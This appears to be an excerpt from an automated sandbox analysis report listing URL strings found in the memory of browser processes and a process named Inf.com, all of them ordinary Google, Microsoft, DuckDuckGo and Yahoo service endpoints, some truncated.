                Source: chrome.exe, 00000011.00000002.2697098490.000051D800B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000011.00000003.2611828132.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json.27.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699355988.000051D8011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000011.00000003.2608726803.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609816701.000051D800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2616350144.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2619759607.000051D800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608688940.000051D800CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609837595.000051D800CCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2622194764.000051D800CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2611828132.000051D800D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000011.00000003.2596264640.000006F8002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2596226146.000006F8002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000011.00000002.2695703721.000051D8007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2605228304.000051D800498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695281946.000051D8006B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696138738.000051D8008E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2935675519.0000510404440000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000011.00000002.2696423318.000051D800984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000011.00000002.2696423318.000051D800984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000011.00000002.2695161383.000051D800654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: chrome.exe, 00000011.00000002.2699759554.000051D80136C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: 2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                Source: manifest.json0.27.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000011.00000003.2644901617.000051D802338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644868444.000051D802334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644766927.000051D802330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                Source: chrome.exe, 00000011.00000002.2697740655.000051D800D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default0
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000011.00000002.2699355988.000051D8011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/oglpH
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionsUI
                Source: manifest.json0.27.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.c
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.go
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: manifest.json0.27.drString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2L
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2d
                Source: chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
